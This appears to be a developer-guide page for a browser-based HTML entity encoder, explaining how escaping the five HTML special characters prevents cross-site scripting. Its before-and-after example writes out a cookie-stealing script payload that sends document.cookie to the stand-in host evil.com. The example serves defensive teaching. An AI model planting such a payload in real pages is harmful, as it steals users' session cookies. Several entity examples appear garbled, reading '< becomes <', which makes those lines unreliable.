Security 2026-03-07

Escape HTML Special Characters for Safe Web Output

Q: Which characters must be escaped in HTML?

The five critical characters: < (less than), > (greater than), & (ampersand), " (double quote), and ' (single quote). Always escape all five to be safe.

Q: What's the difference between HTML encoding and URL encoding?

HTML encoding (&lt;) makes text safe to render in HTML. URL encoding (%3C) makes text safe to include in URLs. They're different contexts requiring different escaping.

Encode HTML entities to safely display user-generated content, prevent XSS attacks, and ensure correct rendering of special characters.

& Uses: HTML Entity Encoder — Free

The Problem

You're rendering user input in HTML. If the user types <code><script>alert('XSS')</script></code>, your page executes it as JavaScript — a cross-site scripting (XSS) vulnerability. You need to escape HTML before rendering.

Why This Matters

XSS is one of the most common web vulnerabilities (OWASP Top 10). Properly escaping HTML entities prevents attackers from injecting malicious scripts. Every piece of user-generated content that gets rendered in HTML must be escaped. Modern frameworks (React, Vue) do this automatically — but if you're using raw DOM manipulation or server-side templates, you must escape manually.

Step-by-Step Instructions

Paste user input or special characters

Enter the text containing HTML special characters: <, >, &, ", '. These are the five characters that must be escaped.

Click Encode

The encoder replaces dangerous characters with HTML entities: < becomes <, > becomes >, & becomes &.

Use the escaped output safely in HTML

The escaped string is safe to insert into HTML. Browsers render entities as their visual character but don't interpret them as HTML tags.

Decode when needed

Use the Decode function to convert HTML entities back to their original characters — useful when processing HTML-escaped content from APIs or databases.

Try It Now — HTML Entity Encoder

Open full page →

HTML Entity Encoder — Live Demo

All processing happens in your browser — no data is sent to any server.

Before & After Example

Raw user input (dangerous to render directly in HTML)

<script>document.cookie = "session=" + document.cookie; fetch("https://evil.com/steal?c=" + btoa(document.cookie));</script>

HTML-encoded output (safe to render — displays as text, not code)

&lt;script&gt;document.cookie = &quot;session=&quot; + document.cookie; fetch(&quot;https://evil.com/steal?c=&quot; + btoa(document.cookie));&lt;/script&gt;

Frequently Asked Questions

Do I need to escape HTML if I'm using React or Vue?

React and Vue escape HTML automatically when using JSX/template syntax ({variable} or {{ variable }}). Only dangerouslySetInnerHTML or v-html bypass escaping — avoid these with user input.

Which characters must be escaped in HTML?

The five critical characters: < (less than), > (greater than), & (ampersand), " (double quote), and ' (single quote). Always escape all five to be safe.

What's the difference between HTML encoding and URL encoding?

HTML encoding (<) makes text safe to render in HTML. URL encoding (%3C) makes text safe to include in URLs. They're different contexts requiring different escaping.

Related Workflows

🔓

Open the standalone tool for more space, keyboard shortcuts, and additional features.

Open HTML Entity Encoder →

← All Developer Guides